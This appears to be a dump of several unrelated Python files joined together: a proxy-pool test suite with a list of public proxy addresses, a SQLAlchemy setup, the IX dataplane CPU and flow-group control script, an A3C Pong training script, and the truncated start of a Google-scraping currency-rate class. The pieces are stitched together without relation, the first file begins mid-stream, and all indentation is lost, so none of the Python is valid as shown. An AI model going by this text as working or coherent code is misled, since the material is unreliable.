"202.108.2.42:80", "106.0.4.116:8081", "175.155.24.22:808",
"123.55.189.10:808", "111.13.7.42:83", "121.237.143.107:808",
"175.155.25.21:808", "119.5.1.44:808", "27.22.49.236:808",
"221.217.34.54:9000", "60.184.174.109:808", "60.184.173.100:808",
"59.56.46.133:808", "101.4.136.34:80", "121.204.102.98:808",
"113.226.65.175:80", "61.178.238.122:63000", "115.220.146.70:808",
"122.241.72.204:808", "175.155.24.2:808", "113.123.127.230:808",
"125.106.224.213:808", "117.43.1.246:808", "119.5.1.33:808",
"119.5.0.4:808", "119.5.0.70:808", "175.155.25.44:808",
"123.55.189.200:808", "180.118.241.227:808", "218.241.234.48:8080",
"175.155.25.28:808", "123.163.130.15:808", "119.5.0.22:808"]
proxy = ["127.0.0.1:{}".format(i+51234) for i in range(300)]
count = len(proxy)
count_proxy = Mock(return_value=(count, proxy))
send_request = count_proxy
count, proxy = send_request()
p, proc = pooler
max_expire = 10
for i in proxy:
p.put(i, randint(2, max_expire))
return p, proc, count
def test_api(conn):
p = ProxyPooler(saver=conn)
for i in range(10):
p.put('127.0.0.1:{}'.format(80+i), i+2)
p.put_list([('127.0.0.1:{}'.format(80+i), i+2) for i in range(10, 20)])
assert p.size == 20
item, expire = p.get()
assert item == '127.0.0.1:80'
p.put('127.0.0.1:100', 1)
item, expire = p._get_item()
assert item['item'] == '127.0.0.1:100'
assert item['expire'] == 1
p._put_item(item, expire)
item, expire = p.get()
assert item == '127.0.0.1:100'
assert expire == 1
items = [p._get_item() for _ in range(10)]
p._put_items(items)
assert p.size == 19
item, expire = p.get()
assert item == '127.0.0.1:81'
item, expire = p._get_item()
assert item['item'] == '127.0.0.1:82'
assert item['expire'] == 4
items = p.get_list(3)
assert len(items) == 3
assert items[0][0] == '127.0.0.1:83'
assert items[0][1] == 5
assert items[1][1] == 6
items, _ = p._get_items(5)
assert len(items) == 5
assert items[0][0]['item'] == '127.0.0.1:86'
assert p.size == 9
items = p.get_list(1)
assert len(items) == 1
assert items[0][0] == '127.0.0.1:91'
items = p.get_list(0)
assert not items
items = p.get_list(-2)
assert not items
items, _ = p._get_items(1)
assert len(items) == 1
assert items[0][0]['item'] == '127.0.0.1:92'
items, _ = p._get_items(0)
assert not items
items = p.get_list(20, rev=True)
assert len(items) == 7
assert items[0][0] == '127.0.0.1:99'
assert p.size == 0
item, expire = p.get()
assert item is None
items, _ = p._get_items(1)
assert not items
def test_connect(pooler, ssl_context):
def client_send(data, queue, ssl_context):
async def _client():
connector = aiohttp.TCPConnector(ssl_context=ssl_context)
session = aiohttp.ClientSession(connector=connector)
async with session.ws_connect('{}/connect'.format(HOST)) as ws:
if isinstance(data, str):
await ws.send_str(data)
elif isinstance(data, bytes):
await ws.send_bytes(data)
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close cmd':
await ws.close()
break
elif msg.type == aiohttp.WSMsgType.BINARY:
items = deserial(msg.data)
queue.put_nowait(items)
break
elif (msg.type == aiohttp.WSMsgType.CLOSED or
msg.type == aiohttp.WSMsgType.ERROR):
break
loop = asyncio.get_event_loop()
loop.run_until_complete(_client())
p, proc = pooler
proc.start()
sleep(1) # wait server start
queue = asyncio.Queue()
client_send(serial([('127.0.0.1:2017', 20)]), queue, ssl_context)
assert p.size == 1
client_send(serial([('127.0.0.1:2018', 40)]), queue, ssl_context)
client_send('get', queue, ssl_context)
assert queue.get_nowait()[0] == ('127.0.0.1:2018', 40)
client_send(serial([('127.0.0.1:2018', 30), ('127.0.0.1:2019', 25),
('127.0.0.1:2020', 20)]), queue, ssl_context)
client_send('get 0', queue, ssl_context)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
assert p.size == 4
client_send('get proxy', queue, ssl_context)
assert p.size == 4
client_send('get 3', queue, ssl_context)
assert queue.get_nowait() == (('127.0.0.1:2018', 30), ('127.0.0.1:2019', 25), ('127.0.0.1:2020', 20))
client_send('get 1', queue, ssl_context)
assert queue.get_nowait() == (('127.0.0.1:2017', 20),)
assert p.size == 0
@srv
def test_server(monkeypatch, proxy, celery_worker):
p, proc, count = proxy
assert p.size == count
proc.start()
proc.join(10 + 5) # 60 = count / VALIDATE_COUNT * max_expire
assert p.size == 0
|
extensions.py
|
import sqlalchemy
from flask_sqlalchemy import SQLAlchemy
from config import *
from sqlalchemy.orm import sessionmaker,scoped_session
import os
# url = 'mysql+pymysql://{0}:{1}@{2}'.format(USER, PASSWORD, HOST)
url = os.getenv("DB_URL")
engine = sqlalchemy.create_engine(url) # connect to server
engine.execute("CREATE SCHEMA IF NOT EXISTS `{0}`;".format(os.getenv("SCHEMA"))) # create 'ase' schema if it does not exist
engine.execute("USE {0};".format(os.getenv("SCHEMA"))) # select new 'ase' schema
db = SQLAlchemy()
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
# from sqlalchemy.orm import scoped_session
# import threading
# from models import *
# from extensions import db, Session
#
# def run():
# threading.Thread(target=task).start()
# print("The main run function has returned")
# return
#
# def task():
# print(f"Task has started on {threading.current_thread().name}")
# sess = Session()
# print(f"Example query of users: {sess.query(User).filter_by(username='cs').first()}")
# print("Task has ended")
# Session.remove()
|
ixcp.py
|
#!/usr/bin/env python
# Copyright 2013-16 Board of Trustees of Stanford University
# Copyright 2013-16 Ecole Polytechnique Federale Lausanne (EPFL)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import argparse
import ctypes
import glob
import mmap
import os
import os.path
import posix_ipc
import struct
import subprocess
import sys
import time
import threading
BITS_PER_LONG = 64
NCPU = 128
ETH_MAX_NUM_FG = 128
NETHDEV = 16
ETH_MAX_TOTAL_FG = ETH_MAX_NUM_FG * NETHDEV
IDLE_FIFO_SIZE = 256
class CpuMetrics(ctypes.Structure):
_fields_ = [
('queuing_delay', ctypes.c_double),
('batch_size', ctypes.c_double),
('queue_size', ctypes.c_double * 3),
('loop_duration', ctypes.c_long),
('idle', ctypes.c_double * 3),
('padding', ctypes.c_byte * 56),
]
class FlowGroupMetrics(ctypes.Structure):
_fields_ = [
('cpu', ctypes.c_uint),
('padding', ctypes.c_byte * 60),
]
class CmdParamsMigrate(ctypes.Structure):
_fields_ = [
('fg_bitmap', ctypes.c_ulong * (ETH_MAX_TOTAL_FG / BITS_PER_LONG)),
('cpu', ctypes.c_uint),
]
class CmdParamsIdle(ctypes.Structure):
_fields_ = [
('fifo', ctypes.c_char * IDLE_FIFO_SIZE),
]
class CommandParameters(ctypes.Union):
_fields_ = [
('migrate', CmdParamsMigrate),
('idle', CmdParamsIdle),
]
class Command(ctypes.Structure):
CP_CMD_NOP = 0
CP_CMD_MIGRATE = 1
CP_CMD_IDLE = 2
CP_STATUS_READY = 0
CP_STATUS_RUNNING = 1
CP_CPU_STATE_IDLE = 0
CP_CPU_STATE_RUNNING = 1
_fields_ = [
('cpu_state', ctypes.c_uint),
('cmd_id', ctypes.c_uint),
('status', ctypes.c_uint),
('cmd_params', CommandParameters),
('no_idle', ctypes.c_byte),
]
class Scratchpad(ctypes.Structure):
_fields_ = [
('remote_queue_pkts_begin', ctypes.c_long),
('remote_queue_pkts_end', ctypes.c_long),
('local_queue_pkts', ctypes.c_long),
('backlog_before', ctypes.c_long),
('backlog_after', ctypes.c_long),
('timers', ctypes.c_long),
('timer_fired', ctypes.c_long),
('ts_migration_start', ctypes.c_long),
('ts_data_structures_done', ctypes.c_long),
('ts_before_backlog', ctypes.c_long),
('ts_after_backlog', ctypes.c_long),
('ts_migration_end', ctypes.c_long),
('ts_first_pkt_at_prev', ctypes.c_long),
('ts_last_pkt_at_prev', ctypes.c_long),
('ts_first_pkt_at_target', ctypes.c_long),
('ts_last_pkt_at_target', ctypes.c_long),
]
class ShMem(ctypes.Structure):
_fields_ = [
('nr_flow_groups', ctypes.c_uint),
('nr_cpus', ctypes.c_uint),
('pkg_power', ctypes.c_float),
('cpu', ctypes.c_int * NCPU),
('padding', ctypes.c_byte * 52),
('cpu_metrics', CpuMetrics * NCPU),
('flow_group', FlowGroupMetrics * ETH_MAX_TOTAL_FG),
('command', Command * NCPU),
('cycles_per_us', ctypes.c_uint),
('scratchpad_idx', ctypes.c_uint),
('scratchpad', Scratchpad * 1024),
]
def bitmap_create(size, on):
bitmap = [0] * (size / BITS_PER_LONG)
for pos in on:
bitmap[pos / BITS_PER_LONG] |= 1 << (pos % BITS_PER_LONG)
return bitmap
def migrate(shmem, source_cpu, target_cpu, flow_groups):
cmd = shmem.command[source_cpu]
cmd.no_idle = 1
bitmap = bitmap_create(ETH_MAX_TOTAL_FG, flow_groups)
cmd.cmd_params.migrate.fg_bitmap = (ctypes.c_ulong * len(bitmap))(*bitmap)
cmd.cmd_params.migrate.cpu = target_cpu
cmd.status = Command.CP_STATUS_RUNNING
cmd.cmd_id = Command.CP_CMD_MIGRATE
while cmd.status != Command.CP_STATUS_READY:
pass
cmd.no_idle = 0
def get_fifo(cpu):
return os.path.abspath('block-%d.fifo' % cpu)
def is_idle(cpu):
return os.path.exists(get_fifo(cpu))
def idle(shmem, cpu):
if is_idle(cpu):
return
fifo = get_fifo(cpu)
os.mkfifo(fifo)
cmd = shmem.command[cpu]
assert len(fifo) + 1 < IDLE_FIFO_SIZE, fifo
cmd.cmd_params.idle.fifo = fifo
cmd.status = Command.CP_STATUS_RUNNING
cmd.cmd_id = Command.CP_CMD_IDLE
while cmd.status != Command.CP_STATUS_READY:
pass
def wake_up(shmem, cpu):
if not is_idle(cpu):
return
fifo = get_fifo(cpu)
fd = os.open(fifo, os.O_WRONLY)
os.write(fd, '1')
os.close(fd)
os.remove(fifo)
cmd = shmem.command[cpu]
while cmd.cpu_state != Command.CP_CPU_STATE_RUNNING:
pass
def set_nr_cpus(shmem, fg_per_cpu, cpu_count, verbose = False):
cpus = cpu_lists.ht_interleaved[:cpu_count]
return set_cpus(shmem, fg_per_cpu, cpus, verbose)
def set_cpulist(shmem, fg_per_cpu, cpulist, verbose = False):
reverse_map = {}
for i in xrange(shmem.nr_cpus):
reverse_map[shmem.cpu[i]] = i
cpus = []
for cpu in cpulist:
if cpu in reverse_map:
cpus.append(reverse_map[cpu])
else:
print >>sys.stderr, 'Invalid cpulist'
return
return set_cpus(shmem, fg_per_cpu, cpus, verbose)
def list_runs_to_str(inp):
if len(inp) == 0:
return '0:[]'
runa = min(inp)
runb = min(inp)
ret = []
for i in xrange(min(inp)+1, max(inp)+2):
if i not in inp:
if runa is not None:
if runa == runb:
ret.append('%d' % runa)
else:
ret.append('%d-%d' % (runa, runb))
runa = None
elif runa is None:
runa = i
runb = i
else:
runb = i
return '%d:[%s]' % (len(inp),','.join(ret))
def set_cpus(shmem, fg_per_cpu, cpus, verbose = False):
global migration_times
fgs_per_cpu = int(shmem.nr_flow_groups / len(cpus))
one_more_fg = shmem.nr_flow_groups % len(cpus)
def fgs_at(cpu):
fgs = fgs_per_cpu
if cpus.index(cpu) < one_more_fg:
fgs += 1
return fgs
migration_times = []
start = 0
for target_cpu in cpus:
shmem.command[target_cpu].no_idle = 1
wake_up(shmem, target_cpu)
for source_cpu in xrange(NCPU):
if source_cpu == target_cpu:
continue
count = min(fgs_at(target_cpu)-len(fg_per_cpu[target_cpu]), len(fg_per_cpu[source_cpu]))
if source_cpu in cpus:
count = min(count, len(fg_per_cpu[source_cpu])-fgs_at(source_cpu))
if count <= 0:
continue
intersection = set(fg_per_cpu[source_cpu][-count:])
#print 'migrate from %d to %d fgs %r' % (source_cpu, target_cpu, list(intersection))
start_time = time.time()
migrate(shmem, source_cpu, target_cpu, list(intersection))
stop_time = time.time()
#if verbose:
# sys.stdout.write('.')
# sys.stdout.flush()
fg_per_cpu[source_cpu] = list(set(fg_per_cpu[source_cpu]) - intersection)
fg_per_cpu[target_cpu] = list(set(fg_per_cpu[target_cpu]) | intersection)
migration_times.append((stop_time - start_time) * 1000)
shmem.command[target_cpu].no_idle = 0
if verbose:
if len(migration_times) > 0:
print '# migration duration min/avg/max = %f/%f/%f ms (%r)' % (min(migration_times), sum(migration_times)/len(migration_times), max(migration_times), migration_times)
for cpu in xrange(shmem.nr_cpus):
if len(fg_per_cpu[cpu]) == 0:
idle(shmem, cpu)
for cpu in xrange(NCPU):
if len(fg_per_cpu[cpu]) == 0:
continue
print '# CPU %02d: flow groups: %s' % (cpu, list_runs_to_str(fg_per_cpu[cpu]))
STEPS_MODE_ENERGY_EFFICIENCY = 1
STEPS_MODE_BACKGROUND_TASK = 2
STEPS_MODE_MINMAX = 3
f = open('/sys/devices/system/cpu/cpu0/topology/core_siblings_list', 'r')
core_count = len(f.readline().split(',')) / 2
f.close()
def get_steps(mode):
f = open('/sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies', 'r')
frequencies = sorted(map(int, f.readline().split()))
f.close()
cpu_list = cpu_lists.ht_at_the_end
steps = []
if mode == STEPS_MODE_ENERGY_EFFICIENCY:
for cpus in xrange(1, core_count + 1):
steps.append({'cpus': cpu_list[:cpus], 'frequency': frequencies[0]})
for freq in frequencies:
steps.append({'cpus': cpu_list[:core_count * 2], 'frequency': freq})
elif mode == STEPS_MODE_BACKGROUND_TASK:
for cpus in xrange(1, core_count + 1):
steps.append({'cpus': cpu_list[:cpus] + cpu_list[core_count:core_count + cpus], 'frequency': frequencies[-2]})
steps.append({'cpus': cpu_list[:core_count * 2], 'frequency': frequencies[-1]})
elif mode == STEPS_MODE_MINMAX:
steps.append({'cpus': [0], 'frequency': frequencies[0]})
steps.append({'cpus': cpu_list[:core_count * 2], 'frequency': frequencies[-1]})
return steps
def calculate_idle_threshold(steps):
turbo_frequency = max(step['frequency'] for step in steps)
idle_threshold = [2]
for i in xrange(1, len(steps)):
step = steps[i]
prv = steps[i-1]
if len(step['cpus']) == core_count * 2 and len(prv['cpus']) == core_count:
idle_threshold.append(1-1/1.3)
elif len(step['cpus']) != len(prv['cpus']):
idle_threshold.append(1.0/len([1 for cpu in step['cpus'] if cpu < core_count]))
elif step['frequency'] != turbo_frequency:
idle_threshold.append(1.0 * (step['frequency'] - prv['frequency']) / step['frequency'])
else:
idle_threshold.append(0.1)
for i in xrange(len(idle_threshold)):
idle_threshold[i] *= 1.2
return idle_threshold
def control_background_job(args, cpus):
if args.background_cpus is None:
return
bg_threads = max(0, len(args.background_cpus) - cpus)
bg_mask = 0
for i in xrange(bg_threads):
bg_mask |= 1 << args.background_cpus[i]
if args.background_fifo is not None:
fd = os.open(args.background_fifo, os.O_WRONLY)
os.write(fd, '%d\n' % bg_threads)
os.close(fd)
if args.background_pid is not None and bg_mask != 0:
DEVNULL = open(os.devnull, 'wb')
subprocess.check_call(['taskset', '-ap', '%x' % bg_mask, str(args.background_pid)], stdout=DEVNULL)
DEVNULL.close()
print '# bg_task threads=%d mask=%x' % (bg_threads, bg_mask)
STEP_UP = 1
STEP_DOWN = 2
def set_step(shmem, fg_per_cpu, step, dir, args):
global set_step_done
if dir == STEP_UP:
control_background_job(args, len([1 for cpu in step['cpus'] if cpu < core_count]))
for directory in glob.glob('/sys/devices/system/cpu/cpu*/cpufreq/'):
f = open('%s/scaling_governor' % directory, 'w')
f.write('userspace\n')
f.close()
f = open('%s/scaling_setspeed' % directory, 'w')
f.write('%s\n' % step['frequency'])
f.close()
set_cpus(shmem, fg_per_cpu, step['cpus'])
set_step_done = True
if dir == STEP_DOWN:
control_background_job(args, len([1 for cpu in step['cpus'] if cpu < core_count]))
def get_all_metrics(shmem, attr):
ret = []
for cpu in xrange(shmem.nr_cpus):
if shmem.command[cpu].cpu_state == Command.CP_CPU_STATE_RUNNING:
ret.append(getattr(shmem.cpu_metrics[cpu], attr))
return ret
def avg(list):
return sum(list) / len(list)
class CpuLists:
pass
cpu_lists = CpuLists()
def compute_cpu_lists(shmem):
reverse_map = {}
for i in xrange(shmem.nr_cpus):
reverse_map[shmem.cpu[i]] = i
cpu_lists.ht_interleaved = []
cpu_lists.ht_at_the_end = []
later = []
for i in xrange(shmem.nr_cpus):
if i in later:
continue
cpu_lists.ht_interleaved.append(i)
cpu_lists.ht_at_the_end.append(i)
f = open('/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list' % shmem.cpu[i], 'r')
hyperthreads = map(int, f.read().split(','))
f.close()
for cpu in hyperthreads:
if cpu not in reverse_map or reverse_map[cpu] == i:
continue
cpu_lists.ht_interleaved.append(reverse_map[cpu])
later.append(reverse_map[cpu])
cpu_lists.ht_at_the_end.extend(later)
def main():
global set_step_done
global migration_times
shm = posix_ipc.SharedMemory('/ix', 0)
buffer = mmap.mmap(shm.fd, ctypes.sizeof(ShMem), mmap.MAP_SHARED, mmap.PROT_WRITE)
shmem = ShMem.from_buffer(buffer)
fg_per_cpu = {}
for i in xrange(NCPU):
fg_per_cpu[i] = []
for i in xrange(shmem.nr_flow_groups):
cpu = shmem.flow_group[i].cpu
fg_per_cpu[cpu].append(i)
"""
print 'flow group assignments:'
for cpu in xrange(NCPU):
if len(fg_per_cpu[cpu]) == 0:
continue
print ' CPU %02d: flow groups %r' % (cpu, fg_per_cpu[cpu])
print 'commands running at:',
empty = True
for i in xrange(NCPU):
if shmem.command[i].status != Command.CP_STATUS_READY:
print 'CPU %02d,' % i,
empty = False
if empty:
print 'none',
print
"""
parser = argparse.ArgumentParser()
parser.add_argument('--single-cpu', action='store_true')
parser.add_argument('--cpus', type=int)
parser.add_argument('--cpulist', type=str)
parser.add_argument('--idle', type=int)
parser.add_argument('--wake-up', type=int)
parser.add_argument('--show-metrics', action='store_true')
parser.add_argument('--control', type=str, choices=['eff', 'back', 'minmax'])
parser.add_argument('--background-fifo', type=str)
parser.add_argument('--background-pid', type=int)
parser.add_argument('--background-cpus', type=str)
parser.add_argument('--print-power', action='store_true')
args = parser.parse_args()
if args.background_cpus is not None:
args.background_cpus = map(int, args.background_cpus.split(','))
compute_cpu_lists(shmem)
if args.single_cpu:
target_cpu = 0
for cpu in xrange(shmem.nr_cpus):
if cpu == target_cpu:
continue
migrate(shmem, cpu, target_cpu, fg_per_cpu[cpu])
sys.stdout.write('.')
sys.stdout.flush()
print
elif args.cpus is not None:
set_nr_cpus(shmem, fg_per_cpu, args.cpus, verbose = True)
elif args.cpulist is not None:
cpulist = map(int, args.cpulist.split(','))
set_cpulist(shmem, fg_per_cpu, cpulist)
elif args.idle is not None:
idle(shmem, args.idle)
elif args.wake_up is not None:
wake_up(shmem, args.wake_up)
elif args.show_metrics:
for cpu in xrange(shmem.nr_cpus):
print 'CPU %d: queuing delay: %d us, batch size: %d pkts' % (cpu, shmem.cpu_metrics[cpu].queuing_delay, shmem.cpu_metrics[cpu].batch_size)
elif args.control is not None:
if args.control == 'eff':
mode = STEPS_MODE_ENERGY_EFFICIENCY
elif args.control == 'back':
mode = STEPS_MODE_BACKGROUND_TASK
elif args.control == 'minmax':
mode = STEPS_MODE_MINMAX
steps = get_steps(mode)
idle_threshold = calculate_idle_threshold(steps)
curr_step_idx = 0
new_step_idx = curr_step_idx
set_step(shmem, fg_per_cpu, steps[curr_step_idx], STEP_UP, args)
last_up = 0
last_down = 0
printed_done = True
set_step_done = True
migration_times = []
while True:
now = time.time()
print now,
fast_queue_size = max([x[0] for x in get_all_metrics(shmem, 'queue_size')])
slow_queue_size = avg([x[2] for x in get_all_metrics(shmem, 'queue_size')])
idle = avg([x[0] for x in get_all_metrics(shmem, 'idle')])
print fast_queue_size,
print avg([x[1] for x in get_all_metrics(shmem, 'queue_size')]),
print slow_queue_size,
print idle,
print avg([x[1] for x in get_all_metrics(shmem, 'idle')]),
print avg([x[2] for x in get_all_metrics(shmem, 'idle')]),
print avg(get_all_metrics(shmem, 'loop_duration')),
print
if fast_queue_size > 32 and curr_step_idx < len(steps) - 1 and now - last_up >= .2 and now - last_down >= 2:
new_step_idx = curr_step_idx + 1
elif slow_queue_size < 8 and idle > idle_threshold[curr_step_idx] and curr_step_idx > 0 and now - last_up >= 4 and now - last_down >= 4:
new_step_idx = curr_step_idx - 1
new_step_idx = int(new_step_idx)
if set_step_done and not printed_done:
print '# %f control_done' % (now,)
if len(migration_times) > 0:
print '# %f migration duration min/avg/max = %f/%f/%f ms (%r)' % (now, min(migration_times), sum(migration_times)/len(migration_times), max(migration_times), migration_times)
migration_times = []
for i in xrange(scratchpad_idx_prv, shmem.scratchpad_idx):
s = shmem.scratchpad[i]
print '# migration %d remote_queue_pkts_begin %d remote_queue_pkts_end %d local_queue_pkts %d backlog_before %d backlog_after %d timers %d' % (i, s.remote_queue_pkts_begin, s.remote_queue_pkts_end, s.local_queue_pkts, s.backlog_before, s.backlog_after, s.timers),
print ' total %d' % ((s.ts_migration_end - s.ts_migration_start ) / shmem.cycles_per_us),
print ' structs %d' % ((s.ts_data_structures_done - s.ts_migration_start ) / shmem.cycles_per_us),
print ' var1 %d' % ((s.ts_first_pkt_at_target - s.ts_data_structures_done) / shmem.cycles_per_us),
print ' rpc %d' % ((s.ts_before_backlog - s.ts_first_pkt_at_target ) / shmem.cycles_per_us),
print ' backlog %d' % ((s.ts_after_backlog - s.ts_before_backlog ) / shmem.cycles_per_us),
print ' lastprv %d' % ((s.ts_last_pkt_at_prev - s.ts_data_structures_done ) / shmem.cycles_per_us),
print ' timer_fired %d' % s.timer_fired,
print
shmem.scratchpad[i].remote_queue_pkts = 0
shmem.scratchpad[i].local_queue_pkts = 0
shmem.scratchpad[i].backlog = 0
shmem.scratchpad[i].migration_duration = 0
printed_done = True
if curr_step_idx != new_step_idx and set_step_done:
if new_step_idx > curr_step_idx:
step = 'up'
last_up = now
dir = STEP_UP
else:
step = 'down'
last_down = now
dir = STEP_DOWN
curr_step_idx = new_step_idx
scratchpad_idx_prv = shmem.scratchpad_idx
set_step_done = False
printed_done = False
thread = threading.Thread(target=set_step, args=(shmem, fg_per_cpu, steps[curr_step_idx], dir, args))
thread.daemon = True
thread.start()
print '# %f control_action %s step=%d x=x freq=%d cpus=%r x=x' % (now, step,curr_step_idx,steps[curr_step_idx]['frequency'],steps[curr_step_idx]['cpus'])
time.sleep(.1)
elif args.print_power:
print shmem.pkg_power
if __name__ == '__main__':
main()
|
02_a3c_grad.py
|
#!/usr/bin/env python3
import os
import gym
import ptan
import argparse
from tensorboardX import SummaryWriter
import torch
import torch.nn.utils as nn_utils
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
from lib import common
GAMMA = 0.99
LEARNING_RATE = 0.001
ENTROPY_BETA = 0.01
REWARD_STEPS = 4
CLIP_GRAD = 0.1
PROCESSES_COUNT = 4
NUM_ENVS = 8
GRAD_BATCH = 64
TRAIN_BATCH = 2
if True:
ENV_NAME = "PongNoFrameskip-v4"
NAME = 'pong'
REWARD_BOUND = 18
else:
ENV_NAME = "BreakoutNoFrameskip-v4"
NAME = "breakout"
REWARD_BOUND = 400
TRAIN_BATCH = 4
def make_env():
return ptan.common.wrappers.wrap_dqn(gym.make(ENV_NAME))
def grads_func(proc_name, net, device, train_queue):
envs = [make_env() for _ in range(NUM_ENVS)]
agent = ptan.agent.PolicyAgent(
lambda x: net(x)[0], device=device, apply_softmax=True)
exp_source = ptan.experience.ExperienceSourceFirstLast(
envs, agent, gamma=GAMMA, steps_count=REWARD_STEPS)
batch = []
frame_idx = 0
writer = SummaryWriter(comment=proc_name)
with common.RewardTracker(writer, REWARD_BOUND) as tracker:
with ptan.common.utils.TBMeanTracker(
writer, 100) as tb_tracker:
for exp in exp_source:
frame_idx += 1
new_rewards = exp_source.pop_total_rewards()
if new_rewards and tracker.reward(
new_rewards[0], frame_idx):
break
batch.append(exp)
if len(batch) < GRAD_BATCH:
continue
data = common.unpack_batch(
batch, net, device=device,
last_val_gamma=GAMMA**REWARD_STEPS)
states_v, actions_t, vals_ref_v = data
batch.clear()
net.zero_grad()
logits_v, value_v = net(states_v)
loss_value_v = F.mse_loss(
value_v.squeeze(-1), vals_ref_v)
log_prob_v = F.log_softmax(logits_v, dim=1)
adv_v = vals_ref_v - value_v.detach()
log_p_a = log_prob_v[range(GRAD_BATCH), actions_t]
log_prob_actions_v = adv_v * log_p_a
loss_policy_v = -log_prob_actions_v.mean()
prob_v = F.softmax(logits_v, dim=1)
ent = (prob_v * log_prob_v).sum(dim=1).mean()
entropy_loss_v = ENTROPY_BETA * ent
loss_v = entropy_loss_v + loss_value_v + \
loss_policy_v
loss_v.backward()
tb_tracker.track("advantage", adv_v, frame_idx)
tb_tracker.track("values", value_v, frame_idx)
tb_tracker.track("batch_rewards", vals_ref_v,
frame_idx)
tb_tracker.track("loss_entropy", entropy_loss_v,
frame_idx)
tb_tracker.track("loss_policy", loss_policy_v,
frame_idx)
tb_tracker.track("loss_value", loss_value_v,
frame_idx)
tb_tracker.track("loss_total", loss_v, frame_idx)
# gather gradients
nn_utils.clip_grad_norm_(
net.parameters(), CLIP_GRAD)
grads = [
param.grad.data.cpu().numpy()
if param.grad is not None else None
for param in net.parameters()
]
train_queue.put(grads)
train_queue.put(None)
if __name__ == "__main__":
mp.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = "1"
parser = argparse.ArgumentParser()
parser.add_argument("--cuda", default=False,
action="store_true", help="Enable cuda")
parser.add_argument("-n", "--name", required=True,
help="Name of the run")
args = parser.parse_args()
device = "cuda" if args.cuda else "cpu"
env = make_env()
net = common.AtariA2C(env.observation_space.shape,
env.action_space.n).to(device)
net.share_memory()
optimizer = optim.Adam(net.parameters(),
lr=LEARNING_RATE, eps=1e-3)
train_queue = mp.Queue(maxsize=PROCESSES_COUNT)
data_proc_list = []
for proc_idx in range(PROCESSES_COUNT):
proc_name = f"-a3c-grad_pong_{args.name}#{proc_idx}"
p_args = (proc_name, net, device, train_queue)
data_proc = mp.Process(target=grads_func, args=p_args)
data_proc.start()
data_proc_list.append(data_proc)
batch = []
step_idx = 0
grad_buffer = None
try:
while True:
train_entry = train_queue.get()
if train_entry is None:
break
step_idx += 1
if grad_buffer is None:
grad_buffer = train_entry
else:
for tgt_grad, grad in zip(grad_buffer,
train_entry):
tgt_grad += grad
if step_idx % TRAIN_BATCH == 0:
for param, grad in zip(net.parameters(),
grad_buffer):
param.grad = torch.FloatTensor(grad).to(device)
nn_utils.clip_grad_norm_(
net.parameters(), CLIP_GRAD)
optimizer.step()
grad_buffer = None
finally:
for p in data_proc_list:
p.terminate()
p.join()
|
rate_processing.py
|
import os
import re
import sqlite3
import time
import logging
import requests
import threading
from bs4 import BeautifulSoup
logging.basicConfig(level=logging.WARNING)
class RateProcessing:
"""
Инициализация класса
"""
def __init__(self, upd_time: int):
self.currencies_ref_dict = {
'EUR': 'https://www.google.com/search?ei=ijQkX56kHcGEwPAPtPSa2AQ&q=%D0%BA%D1%83%D1%80%D1%81+%D0%B5%D0%B2'
'%D1%80%D0%BE+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&oq=%D0%BA%D1%83%D1%80%D1%81+%D0%B5%D0%B2%D1%80'
'%D0%BE+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&gs_lcp=CgZwc3ktYWIQAzINCAAQsQMQgwEQRhCCAjIICAAQsQMQ'
'gwEyCAgAELEDEIMBMgYIABAHEB4yCAgAELEDEIMBMgYIABAHEB4yAggAMgIIADIGCAAQBxAeMgIIADoHCAAQsAMQQzoICAAQ'
'BxAKEB46BAgAEA1QhbERWPvWEWCe3hFoA3AAeACAAVaIAboGkgECMTOYAQCgAQGqAQdnd3Mtd2l6wAEB&sclient=psy-ab'
'&ved=0ahUKEwiekdiV4_fqAhVBAhAIHTS6BksQ4dUDCAw&uact=5',
'USD': 'https://www.google.com/search?ei=fDQkX5esEsOxrgTI_ImADQ&q=%D0%BA%D1%83%D1%80%D1%81+%D0%B4%D0%BE%'
'D0%BB%D0%BB%D0%B0%D1%80%D0%B0+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&oq=%D0%BA%D1%83%D1%80%D1%81+'
'%D0%B4%D0%BE%D0%BB%D0%BB%D0%B0%D1%80%D0%B0+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&gs_lcp=CgZwc3k'
'tYWIQAzIPCAAQsQMQgwEQQxBGEIICMggIABCxAxCDATIICAAQsQMQgwEyBQgAELEDMgIIADICCAAyAggAMggIABCxAxCDATI'
'CCAAyAggAOgcIABCwAxBDOgoIABCxAxCDARBDOgQIABBDOgQIABAKOgkIABBDEEYQggI6BwgAELEDEENQsylYmWZglmhoBHAA'
'eACAAWOIAewJkgECMTmYAQCgAQGqAQdnd3Mtd2l6wAEB&sclient=psy-ab&ved=0ahUKEwiX2vaO4_fqAhXDmIsKHUh-AtA'
'Q4dUDCAw&uact=5',
'CHF': 'https://www.google.com/search?ei=rTUkX4bmMMTnrgTnpKLADg&q=%D0%BA%D1%83%D1%80%D1%81+%D1%88%D0%'
